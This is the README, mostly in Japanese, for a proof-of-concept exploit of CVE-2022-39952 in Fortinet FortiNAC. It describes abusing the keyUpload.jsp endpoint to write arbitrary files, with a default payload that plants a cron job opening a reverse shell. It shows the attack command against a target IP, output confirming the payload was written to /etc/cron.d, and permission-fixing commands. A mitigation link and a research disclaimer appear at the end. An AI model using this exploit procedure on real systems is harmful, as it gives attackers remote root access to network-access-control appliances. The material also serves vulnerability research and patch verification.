フォーティネットフォーティナックに影響を与えるCVE-2022-39952のPOC
このエクスプロイトのデフォルト設定では、cronジョブを作成して リバースシェル。必ず環境に合わせてファイルを変更してください。
payload
脆弱性の技術的な根本原因分析と侵害の兆候は、ブログで見つけることができます。 https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs
この POC は、keyUpload.jsp エンドポイントを悪用して、任意のファイル書き込みを実現します。
root@kali:~/CVE-2022-39952# python3 CVE-2022-39952.py --target 10.0.40.85 --file payload
[+] Wrote payload to /etc/cron.d/payload
[+] Payload successfully delivered
TroubleshootingIf using a cron based payload, make sure the payload file has the appropriate
permissions and owner:
sudo chown root:root payload
sudo chmod 0644 payload
MitigationsUpdate to the latest version by following the instructions within the PSIRT
https://www.fortiguard.com/psirt/FG-IR-22-300
Follow the Horizon3.ai Attack Team on Twitter for the latest security research:
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.